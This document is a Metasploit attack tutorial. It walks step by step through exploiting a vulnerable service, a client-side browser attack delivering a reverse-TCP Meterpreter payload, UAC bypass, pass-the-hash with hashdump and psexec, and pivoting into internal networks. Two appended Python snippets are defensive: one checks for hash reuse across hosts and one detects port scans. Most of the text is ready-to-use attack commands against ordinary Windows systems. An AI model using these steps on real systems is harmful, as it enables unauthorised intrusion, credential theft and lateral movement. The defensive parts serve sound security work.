Metasploit – Attacks

By | 30/10/2014

Direct Attack

The attack consists of locating a vulnerable service on a server and using an exploit to obtain access to the system.

  1. Port scan and scanners to identify versions
    • Use auxiliary/scanner/portscan/tcp
    • Use auxiliary/scanner/smb/smb_version
    • Use auxiliary/scanner/http/http_version
      • Use show options and set <option> to configure the scanner module
  2. Search for or download an exploit for the vulnerable service.
    • If it is not available in Metasploit, copy the rb file into module/exploit/<system>/<service>/
    • use exploit/<system>/<service>/<exploit>
      • Use show options and set <option> to configure the exploit
    • Execute run or exploit

An easy example to try this attack with is the Easy File Management vulnerability.

Client Side Attack

It consists of waiting for clients to connect to a website, where they are redirected to the Metasploit machine, which is listening on a port. Metasploit then tries to run an exploit on the client machine.

  1. Apache configuration
    • Set up a website with an iframe (or other elements) pointing to port 8080 of the Metasploit machine
  2. Configure a listening port in Metasploit prepared to answer with the Java exploit
    • Use exploit/multi/browser/<exploit>
    • Set uripath /
    • Set payload java/meterpreter/reverse_tcp
    • Set target: this specifies the target system, which allows more payload options but limits the scope of the attack to that system only (show targets, set target).
  3. The client accesses the website. The connection will be set up as a session in Metasploit.

As an option, initialautorunscript can be set in the payload to run a few commands as soon as the exploit runs on the client machine. This script can point to an rc file containing more than one command.
set initialautorunscript 'multi_console_command -rc /root/ncn.rc'

As an example, Java 7 update 5 can be exploited using the java_jre17_jmxbean exploit.

Privilege escalation

When an exploit runs successfully on the victim, it usually gives the Meterpreter session or the payload non-admin rights. To get Administrator or System rights, a privilege escalation is needed. The process depends on the victim system.

The objective of the attacker is to get a Meterpreter console with System rights (the getuid command in the Meterpreter console provides that information).

Windows 7 x64

  1. Create a Meterpreter payload application
    • use payload/windows/meterpreter/reverse_tcp
    • generate -f /root/test.exe (this seems to create a 32-bit file… how to create a 64-bit one?)
  2. Create a handler to listen to the reverse meterpreter
    • use exploit/multi/handler
    • exploit -j (make it run in the background)
  3. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  4. Upload bypassuac.exe, bypassuac.dll and test.exe to the victim server
    • Meterpreter Shell> upload /usr/share/metasploit-framework/data/post/bypassuac-x64.exe c:\\users\\<username>\\
  5. Run windows shell from meterpreter
    • Meterpreter Shell> shell
  6. Execute “bypassuac -c cd”
    • This will open a new shell in c:\windows\system32
  7. Open a reverse connection by running the test.exe application
    • A new session should be set up in the Metasploit framework

Windows 7 x86

  1. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  2. Return to the Metasploit console using ctrl+z
  3. Run the Windows local exploit to bypass the UAC
    • use exploit/windows/local/bypassuac
    • set sessionID to the session already open on the server
    • if the exploit is successful, it will generate a new session with System rights

Windows XP

  1. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  2. Run the command Meterpreter shell> getsystem

Pass the Hash

This attack consists of using the administrator user hash obtained on one server to log in to other servers. It will only work if the password is the same on both servers.

  1. Exploit a server and obtain system privilege with Meterpreter (see the previous sections)
  2. Use the Meterpreter script run hashdump to obtain the Administrator password (hash:salt)
  3. Use the psexec exploit with the password hash
    • use exploit/windows/smb/psexec
    • set SMBpass HASH:SALT
    • a new shell will be opened with SYSTEM privileges!

When the server is a Domain Controller, the POST module post/windows/gather/smart_hashdump can be used to obtain the hashes of all the users in the domain controller.
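An added example (not part of the original post) that audits for the condition this attack depends on: the same account password, and therefore the same hash, on more than one server. It assumes hashdump-style lines (user:RID:LM hash:NT hash:::) collected per host; the host names and hash values below are constructed.

```python
from collections import defaultdict

# NT hash of the empty password; blank or disabled accounts carry it everywhere.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

def parse_dump(text):
    """Yield (user, rid, nt_hash) from user:RID:LM:NT::: lines, skipping junk."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        nt = parts[3].lower()
        if len(nt) == 32 and all(c in "0123456789abcdef" for c in nt):
            yield parts[0], int(parts[1]), nt

def shared_hashes(dumps):
    """Map NT hash -> sorted [(host, user)] for hashes present on 2+ hosts."""
    seen = defaultdict(set)
    for host, text in dumps.items():
        for user, _rid, nt in parse_dump(text):
            if nt != EMPTY_NT:
                seen[nt].add((host, user))
    return {nt: sorted(locs) for nt, locs in seen.items()
            if len({host for host, _ in locs}) > 1}

# Constructed sample: WEB01 and DB01 share a local Administrator password,
# FILE01 reuses one password for two accounts but only on that host.
SAMPLE = {
    "WEB01": f"Administrator:500:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::\n"
             f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    "DB01": f"Administrator:500:{EMPTY_LM}:0123456789ABCDEF0123456789ABCDEF:::\n"
            f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::\n"
            "not a hash line",
    "FILE01": f"Administrator:500:{EMPTY_LM}:fedcba9876543210fedcba9876543210:::\n"
              f"svc_backup:1001:{EMPTY_LM}:fedcba9876543210fedcba9876543210:::",
}

if __name__ == "__main__":
    for nt, locs in shared_hashes(SAMPLE).items():
        print(nt, "reused on", locs)
```

Every host listed for a hash is reachable with a credential taken from any other host in that list, so each of those accounts needs its own password.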

Pivoting

This technique uses an already established session on a victim to route Metasploit attacks through the victim to the internal network.

  1. Exploit a server and open a meterpreter shell (see the previous sections)
  2. Check the network connections and confirm there is an internal network only accessible by the victim
    • Meterpreter> ipconfig
  3. Return to the msfconsole and add a route to that internal network through the victim session
    • Msfconsole> route print – to check the current routes
    • Msfconsole> sessions – to check the sessions
    • Msfconsole> route add 10.0.0.0 255.255.255.0 SESSIONID
  4. Perform a network/port scan of the private network
    • Use auxiliary/scanner/portscan/tcp
    • set rhosts 10.0.0.0/24, set ports 60-200, set threads 10

Pivoting can also be done directly from the Meterpreter console through the autoroute command.
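Traffic sent over such a route reaches the internal network from the victim's own address, so the scan in step 4 appears there as one internal host suddenly connecting to many host/port pairs. The following detection sketch is an added example, not part of the original post; the log format, addresses and thresholds are assumptions, and lines are expected in time order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)")

def detect_scanners(lines, window_s=60, min_targets=20):
    """Return {src: peak distinct (dst, dport) pairs} for sources that touch
    at least min_targets distinct pairs within any window_s-second window."""
    recent = defaultdict(deque)  # src -> deque of (time, (dst, dport))
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        src, target = m.group(2), (m.group(3), int(m.group(4)))
        q = recent[src]
        q.append((ts, target))
        # Drop events that have fallen out of the sliding window.
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = len({t for _, t in q})
        if distinct >= min_targets:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged

def sample_log():
    """Constructed log: 10.0.0.5 sweeps 10 hosts x 3 ports in 30 s,
    10.0.0.20 is a busy file-share client, 10.0.0.21 polls slowly."""
    t0 = datetime(2014, 10, 30, 10, 0, 0)
    rows, i = [], 0
    for host in range(1, 11):
        for port in (80, 135, 139):
            rows.append((t0 + timedelta(seconds=i), "10.0.0.5", f"10.0.0.{host}", port))
            i += 1
    for k in range(40):
        rows.append((t0 + timedelta(seconds=k), "10.0.0.20", "10.0.0.2", 139))
    for k in range(25):
        rows.append((t0 + timedelta(minutes=10 * k), "10.0.0.21", f"10.0.0.{100 + k}", 443))
    rows.sort(key=lambda r: r[0])
    return [f"{t.isoformat()} src={s} dst={d} dport={p}" for t, s, d, p in rows]

if __name__ == "__main__":
    print(detect_scanners(sample_log()))
```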